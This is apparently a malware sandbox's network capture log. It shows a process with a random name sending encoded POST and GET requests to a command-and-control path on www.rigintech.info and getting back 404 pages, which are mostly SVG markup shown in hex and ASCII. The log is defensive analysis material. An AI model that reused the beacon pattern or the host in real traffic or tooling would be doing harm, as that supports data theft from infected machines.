                                                    Sep 5, 2024 14:25:53.203984976 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                    Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                    Sep 5, 2024 14:25:53.203996897 CEST | 448 | IN | Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                    Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                    Sep 5, 2024 14:25:53.204010010 CEST | 1236 | IN | Data Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36
                                                    Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
                                                    Sep 5, 2024 14:25:53.204046011 CEST | 1236 | IN | Data Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31
                                                    Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
                                                    Sep 5, 2024 14:25:53.204056978 CEST | 448 | IN | Data Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20
                                                    Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
                                                    Sep 5, 2024 14:25:53.204076052 CEST | 1236 | IN | Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                    Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                    Sep 5, 2024 14:25:53.204082966 CEST | 1236 | IN | Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                    Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                    Sep 5, 2024 14:25:53.204088926 CEST | 448 | IN | Data Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                    Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                    Sep 5, 2024 14:25:53.204904079 CEST | 1236 | IN | Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                    Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                    Sep 5, 2024 14:25:53.209186077 CEST | 1236 | IN | Data Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                    Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    15 | 192.168.2.5 | 57206 | 162.0.213.94 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:25:55.133116007 CEST | 1745 | OUT | POST /ig9u/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.rigintech.info
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.rigintech.info
                                                    Referer: http://www.rigintech.info/ig9u/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 4f 75 7a 35 45 31 59 56 63 44 4b 73 61 65 6e 49 55 38 48 75 4b 55 63 35 41 71 4d 71 6b 6f 61 34 34 4a 58 51 79 47 56 73 77 53 56 49 49 56 54 52 6a 48 64 72 35 47 76 44 6f 55 43 70 43 50 79 2f 4a 6a 39 31 68 6b 36 72 2f 75 62 73 63 2b 73 4d 4a 70 65 77 62 67 6a 6d 57 6f 54 6d 77 64 4a 33 43 46 31 55 4d 4f 56 59 7a 7a 6c 70 78 59 4d 51 4e 41 36 79 61 79 79 45 48 47 69 4b 65 6f 6f 65 47 78 2b 79 70 4d 63 6c 5a 66 4c 30 52 34 52 45 72 50 59 61 64 52 53 38 66 48 37 4c 6e 69 35 4c 4c 33 6e 34 47 73 6e 56 47 64 79 55 76 2f 51 6b 43 73 30 6d 4e 74 37 62 4a 69 6b 78 48 52 6e 43 39 68 36 6d 50 65 69 76 32 37 38 44 70 6b 6e 6c 66 36 59 4c 6f 33 4a 68 55 68 77 62 58 51 31 50 57 78 48 76 2f 56 36 4a 62 61 55 4b 77 43 4d 4a 61 69 50 49 6c 31 6b 49 4b 6a 47 42 59 54 72 45 53 39 4d 50 68 75 64 43 44 55 4f 64 75 61 69 63 74 2f 47 72 76 37 51 31 43 78 4e 51 36 46 2f 56 46 74 46 45 77 6a 4e 58 36 4d 4f 46 59 34 4c 6f 6d 63 34 38 4b 71 34 30 77 56 6d 2f 37 30 65 56 58 39 37 39 54 51 75 72 42 46 66 65 49 6f [TRUNCATED]
                                                    Data Ascii: V6h= [TRUNCATED]
                                                    Sep 5, 2024 14:25:55.738493919 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Sep 2024 12:25:55 GMT
                                                    Server: Apache
                                                    Content-Length: 16052
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                    Sep 5, 2024 14:25:55.738517046 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                    Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                    Sep 5, 2024 14:25:55.738528967 CEST | 1236 | IN | Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                    Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                    Sep 5, 2024 14:25:55.738539934 CEST | 672 | IN | Data Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                    Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                    Sep 5, 2024 14:25:55.738567114 CEST | 1236 | IN | Data Raw: 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33 2e 34 31 37 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30
                                                    Data Ascii: 5.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4517" d="m 76.9375,124.6
                                                    Sep 5, 2024 14:25:55.738584042 CEST | 1236 | IN | Data Raw: 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33 2c 33 38 2e 39 39 38 30 39 20 2d 33 2e 36 30 34 34 38 2c 31 34 2e 36 36 31 37 37 20 2d 38 2e 30 36 32 31 32 2c 33 31 2e 31 37 31 35 34 20 2d 31 32 2e 35 36 32 34 34 2c 34 37 2e 38 33 39
                                                    Data Ascii: 16,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                    Sep 5, 2024 14:25:55.738595963 CEST | 1236 | IN | Data Raw: 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 33 37 22 0a 20 20 20
                                                    Data Ascii: inejoin:miter;stroke-opacity:1;" /> <path id="path4537" d="m 87.0625,123.03748 c 2.916637,10.42937 5.833458,20.8594 7.291964,26.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.82
                                                    Sep 5, 2024 14:25:55.738605022 CEST | 104 | IN | Data Raw: 20 2d 35 2e 30 37 34 39 37 35 2c 32 36 2e 30 33 34 38 33 20 2d 31 2e 31 31 39 35 36 38 2c 35 2e 38 39 32 36 34 20 2d 31 2e 35 39 30 39 32 2c 37 2e 37 37 38 30 35 20 2d 31 2e 38 38 35 37 30 38 2c 31 30 2e 30 37 37 30 36 20 2d 30 2e 32 39 34 37 38
                                                    Data Ascii: -5.074975,26.03483 -1.119568,5.89264 -1.59092,7.77805 -1.885708,10.07706 -0.294789,2.29901 -0.412567,5.
                                                    Sep 5, 2024 14:25:55.738615990 CEST | 1236 | IN | Data Raw: 30 30 37 39 20 35 2e 31 65 2d 35 2c 31 37 2e 35 36 33 33 39 20 30 2e 34 31 32 36 31 37 2c 31 32 2e 35 35 35 34 38 20 31 2e 33 35 35 30 36 34 2c 33 34 2e 39 33 38 35 39 20 32 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33
                                                    Data Ascii: 0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:
                                                    Sep 5, 2024 14:25:55.738629103 CEST | 224 | IN | Data Raw: 32 35 31 20 36 2e 31 32 38 38 35 2c 2d 31 2e 32 33 37 37 34 20 39 2e 31 39 31 38 2c 2d 32 2e 30 36 32 33 38 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                    Data Ascii: 251 6.12885,-1.23774 9.1918,-2.06238" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560"
                                                    Sep 5, 2024 14:25:55.743557930 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 2e 31 31 33 31 39 39 2c 31 39 38 2e 31 36 38 32 31 20 63 20 34 37 2e 35 34 37 30 33 38 2c 30 2e 34 30 33 36 31 20 39 35 2e 30 39 33 30 37 31 2c 30 2e 38 30 37 32 31 20 31 34 32 2e 36 33 38 31
                                                    Data Ascii: d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;stroke:#000000;stroke-width:1.00614154px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    16 | 192.168.2.5 | 57207 | 162.0.213.94 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:25:57.665898085 CEST | 449 | OUT | GET /ig9u/?V6h=DsbZHDl7ETyucOGSRMDREU0gLqon/JCM1qPnn3cy3RxLEFGk9lVuu2W6wSDxGu+YER8koFm75cmrGcIzTbmZQ3LhDYrene07E1oxIZlh9GtUu7RZMRKLFDCiJnSgV5dMHg==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.rigintech.info
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:25:58.268325090 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Sep 2024 12:25:58 GMT
                                                    Server: Apache
                                                    Content-Length: 16052
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                    Sep 5, 2024 14:25:58.268467903 CEST | 1236 | IN | Data Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                    Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                    Sep 5, 2024 14:25:58.268486023 CEST | 1236 | IN | Data Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                    Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                    Sep 5, 2024 14:25:58.268503904 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                    Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                                                    Sep 5, 2024 14:25:58.268517971 CEST | 896 | IN | Data Raw: 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32
                                                    Data Ascii: 8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000
                                                    Sep 5, 2024 14:25:58.268529892 CEST | 1236 | IN | Data Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e
                                                    Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
                                                    Sep 5, 2024 14:25:58.268543005 CEST | 1236 | IN | Data Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e
                                                    Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.00342
                                                    Sep 5, 2024 14:25:58.268553972 CEST | 448 | IN | Data Raw: 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30
                                                    Data Ascii: 00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.232
                                                    Sep 5, 2024 14:25:58.270776987 CEST | 1236 | IN | Data Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                                                    Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                    Sep 5, 2024 14:25:58.270786047 CEST | 1236 | IN | Data Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                                                    Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"
                                                    Sep 5, 2024 14:25:58.273403883 CEST | 1236 | IN | Data Raw: 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74
